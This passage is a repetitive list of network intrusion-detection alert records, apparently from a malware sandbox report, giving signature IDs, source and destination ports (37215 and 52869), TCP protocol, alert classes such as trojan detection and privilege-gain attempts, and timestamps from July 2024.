                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.498136
                      SID:2027339
                      Source Port:53224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653028
                      SID:2835222
                      Source Port:33226
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.176893
                      SID:2027339
                      Source Port:41980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.432917
                      SID:2027339
                      Source Port:38766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333872
                      SID:2027339
                      Source Port:51986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.246033
                      SID:2027339
                      Source Port:56978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.544188
                      SID:2027339
                      Source Port:42936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.287452
                      SID:2025132
                      Source Port:51150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.261796
                      SID:2027339
                      Source Port:49158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:51774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.721025
                      SID:2027339
                      Source Port:38956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.616434
                      SID:2831300
                      Source Port:38648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.978141
                      SID:2829579
                      Source Port:60358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.915367
                      SID:2027339
                      Source Port:42506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.943244
                      SID:2835222
                      Source Port:55978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.485253
                      SID:2831300
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.238230
                      SID:2027339
                      Source Port:35440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.943881
                      SID:2831300
                      Source Port:53742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.170156
                      SID:2025132
                      Source Port:40232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:56668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.527234
                      SID:2027339
                      Source Port:48880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.128674
                      SID:2027339
                      Source Port:51322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2829579
                      Source Port:37938
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.533243
                      SID:2025132
                      Source Port:44868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.204741
                      SID:2027339
                      Source Port:52070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.165954
                      SID:2025132
                      Source Port:45156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.205247
                      SID:2025132
                      Source Port:51268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.680845
                      SID:2027339
                      Source Port:46268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2027339
                      Source Port:59576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.319020
                      SID:2027339
                      Source Port:44376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.055687
                      SID:2025132
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:58.249042
                      SID:2027339
                      Source Port:33212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.827498
                      SID:2835222
                      Source Port:52512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:32866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2829579
                      Source Port:37100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.806210
                      SID:2831300
                      Source Port:44198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.411586
                      SID:2831300
                      Source Port:55468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.891763
                      SID:2027339
                      Source Port:48814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636534
                      SID:2835222
                      Source Port:60674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148145
                      SID:2829579
                      Source Port:36240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.886284
                      SID:2835222
                      Source Port:59416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809185
                      SID:2027339
                      Source Port:52892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.583885
                      SID:2027339
                      Source Port:58320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:23.872117
                      SID:2025132
                      Source Port:46058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.187124
                      SID:2025132
                      Source Port:49100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.631848
                      SID:2027339
                      Source Port:59006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.731126
                      SID:2025132
                      Source Port:56040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.783904
                      SID:2025132
                      Source Port:55398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.113390
                      SID:2829579
                      Source Port:60610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.016561
                      SID:2027339
                      Source Port:46870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.678633
                      SID:2025132
                      Source Port:37760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.658201
                      SID:2835222
                      Source Port:38354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.349768
                      SID:2027339
                      Source Port:34456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.667238
                      SID:2027339
                      Source Port:33240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.434940
                      SID:2027339
                      Source Port:34012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.258882
                      SID:2027339
                      Source Port:48378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2829579
                      Source Port:41410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2027339
                      Source Port:46100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.372532
                      SID:2831300
                      Source Port:57208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.763925
                      SID:2027339
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.249014
                      SID:2027339
                      Source Port:37622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.141323
                      SID:2027339
                      Source Port:51316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.277122
                      SID:2025132
                      Source Port:55422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.053604
                      SID:2829579
                      Source Port:37496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.479337
                      SID:2025132
                      Source Port:43420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.151857
                      SID:2025132
                      Source Port:44722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.076036
                      SID:2831300
                      Source Port:54624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.597058
                      SID:2831300
                      Source Port:44578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2831300
                      Source Port:58596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.450410
                      SID:2831300
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2831300
                      Source Port:34218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2025132
                      Source Port:35238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.203134
                      SID:2027339
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2835222
                      Source Port:58806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.713313
                      SID:2027339
                      Source Port:40798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.671155
                      SID:2831300
                      Source Port:43120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.459445
                      SID:2831300
                      Source Port:50914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.525128
                      SID:2831300
                      Source Port:45820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.839288
                      SID:2027339
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.407049
                      SID:2831300
                      Source Port:35450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:51098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2027339
                      Source Port:35058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.348899
                      SID:2027339
                      Source Port:53338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.137774
                      SID:2027339
                      Source Port:37142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.181097
                      SID:2831300
                      Source Port:44604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2835222
                      Source Port:53540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.328797
                      SID:2027339
                      Source Port:53538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.104633
                      SID:2831300
                      Source Port:37702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.329269
                      SID:2027339
                      Source Port:56996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.845732
                      SID:2831300
                      Source Port:46188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.738721
                      SID:2027339
                      Source Port:50512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.179680
                      SID:2025132
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.686830
                      SID:2831300
                      Source Port:56344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.852602
                      SID:2027339
                      Source Port:41254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.036064
                      SID:2829579
                      Source Port:38344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.595910
                      SID:2027339
                      Source Port:47002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.645031
                      SID:2831300
                      Source Port:39976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.035135
                      SID:2027339
                      Source Port:57600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.488676
                      SID:2027339
                      Source Port:47140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.726021
                      SID:2831300
                      Source Port:41158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.829737
                      SID:2025132
                      Source Port:35970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:40988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.743968
                      SID:2027339
                      Source Port:37572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.090583
                      SID:2027339
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:42854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.646615
                      SID:2027339
                      Source Port:32940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.296076
                      SID:2835222
                      Source Port:37636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:51016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314146
                      SID:2027339
                      Source Port:59934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.658614
                      SID:2831300
                      Source Port:59664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:24.904906
                      SID:2835222
                      Source Port:51310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.224525
                      SID:2831300
                      Source Port:45980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2829579
                      Source Port:50358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.304967
                      SID:2027339
                      Source Port:34938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.223015
                      SID:2829579
                      Source Port:36772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.789203
                      SID:2027339
                      Source Port:48232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:52194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.111381
                      SID:2829579
                      Source Port:35496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2027339
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.963505
                      SID:2025132
                      Source Port:47468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.912435
                      SID:2027339
                      Source Port:55434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649885
                      SID:2835222
                      Source Port:54310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2831300
                      Source Port:36948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.434719
                      SID:2027339
                      Source Port:34494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:56590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.066571
                      SID:2027339
                      Source Port:38936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222279
                      SID:2829579
                      Source Port:47332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2025132
                      Source Port:33652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2835222
                      Source Port:50652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.075399
                      SID:2025132
                      Source Port:55444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.965786
                      SID:2027339
                      Source Port:41888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.825081
                      SID:2831300
                      Source Port:49942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.238000
                      SID:2027339
                      Source Port:38464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.213564
                      SID:2829579
                      Source Port:40646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005155
                      SID:2829579
                      Source Port:39444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2027339
                      Source Port:52870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321188
                      SID:2027339
                      Source Port:57476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.467111
                      SID:2025132
                      Source Port:37268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.004063
                      SID:2027339
                      Source Port:40942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.392094
                      SID:2027339
                      Source Port:36884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222090
                      SID:2835222
                      Source Port:41354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589759
                      SID:2831300
                      Source Port:35948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.585824
                      SID:2025132
                      Source Port:37250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.414030
                      SID:2027339
                      Source Port:33672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.805449
                      SID:2831300
                      Source Port:60586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:14.779973
                      SID:2027339
                      Source Port:54124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.915641
                      SID:2027339
                      Source Port:57594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2829579
                      Source Port:44942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.965535
                      SID:2025132
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2027339
                      Source Port:54532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221145
                      SID:2835222
                      Source Port:56886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2835222
                      Source Port:37284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.817737
                      SID:2831300
                      Source Port:52942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.559176
                      SID:2027339
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.903732
                      SID:2027339
                      Source Port:59476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.430595
                      SID:2025132
                      Source Port:46182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.161942
                      SID:2025132
                      Source Port:55620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2025132
                      Source Port:43356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.126869
                      SID:2829579
                      Source Port:40750
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2829579
                      Source Port:50932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.060731
                      SID:2835222
                      Source Port:60036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.228425
                      SID:2027339
                      Source Port:43454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.275555
                      SID:2025132
                      Source Port:46150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.417573
                      SID:2027339
                      Source Port:52788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2831300
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.329268
                      SID:2027339
                      Source Port:50588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:19.406496
                      SID:2025132
                      Source Port:48398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.252602
                      SID:2027339
                      Source Port:35072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.530468
                      SID:2027339
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:45724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.892811
                      SID:2027339
                      Source Port:53416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221220
                      SID:2829579
                      Source Port:58196
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.602712
                      SID:2831300
                      Source Port:53166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.877228
                      SID:2831300
                      Source Port:56862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.170008
                      SID:2831300
                      Source Port:50656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.633481
                      SID:2835222
                      Source Port:53458
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:42714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2831300
                      Source Port:48316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.277123
                      SID:2025132
                      Source Port:55390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.629075
                      SID:2027339
                      Source Port:36186
                      Destination Port:52869
